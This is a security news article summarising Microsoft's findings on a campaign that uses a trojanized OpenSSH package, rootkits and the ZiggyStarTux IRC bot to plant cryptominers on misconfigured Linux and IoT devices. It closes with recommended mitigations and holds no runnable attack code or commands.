Weaponized OpenSSH

Cybersecurity researchers at Microsoft recently found an attack targeting Linux-based systems and IoT devices.

It has been identified that the exploit employs custom and open-source tools to gain control of the impacted devices and install cryptomining malware on them by leveraging the patched OpenSSH.


By leveraging a criminal infrastructure with a Southeast Asian financial institution’s subdomain as a C2 server, threat actors deploy a backdoor.

To mine, it uses different tools, such as rootkits and an IRC bot, to exploit device resources.

Here below, we have mentioned the tasks that the backdoor performs:-

  • It deploys patched OpenSSH
  • Hijacks SSH credentials
  • Moves laterally
  • Hides malicious connections 

Apart from this, to evade detection, the attack complexity and scope reveal the determined efforts of the attackers.

Weaponized OpenSSH Tool Used

By brute-forcing credentials, this attack is initiated by the threat actors on the Linux devices that are internet-facing and misconfigured.

Once a device is compromised, they disable shell history and then, from a remote server, fetch a compromised OpenSSH archive (openssh-8.0p1.tgz).

Simultaneously deployed, the backdoor shell script and trojanized OpenSSH binary add two public keys for persistent SSH access.

This enables information harvesting and installation of Reptile and Diamorphine LKM rootkits to cloak malicious actions on compromised systems.

The backdoor helps eliminate rival miners, add iptables rules, and modify ‘/etc/hosts’ to block competitor traffic.

It identifies and terminates miner processes, blocks file access, and removes SSH access configured by threat actors in authorized_keys.

Attack Flow

Attackers deploy ZiggyStarTux IRC bot (based on the Kaiten malware) with DDoS abilities for bash command execution. To maintain persistence, the backdoor malware uses various techniques like:- 

  • Replicates binaries across multiple disk locations
  • Establishes cron jobs for periodic execution

Moreover, as a systemd service, the ‘ZiggyStarTux’ is registered, and the service file of it located at the following location:-

  • /etc/systemd/system/network-check.service

It’s been identified that the bots instructed to download & execute shell scripts to brute-force live hosts and vulnerable backdoor systems via trojanized OpenSSH package.

According to a Microsoft report, the attacker aims to install the mining malware targeting “Linux-based Hiveon OS systems” for cryptomining after lateral network movement.


Here below, we have mentioned all the recommended mitigations offered by the security researchers at Microsoft:-

  • Ensure that the settings of devices are configured securely.
  • Make sure to keep your devices healthy by regularly updating them.
  • Make use of limited access privileges to strengthen security measures.
  • Make sure to update OpenSSH to the latest version for optimal performance and security.
  • Implement a complete and robust security solution for your IoT devices.
  • Make use of security solutions that offer detection capabilities and the ability to monitor multiple domains.

Manage and secure Your Endpoints Efficiently – Free Download

Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.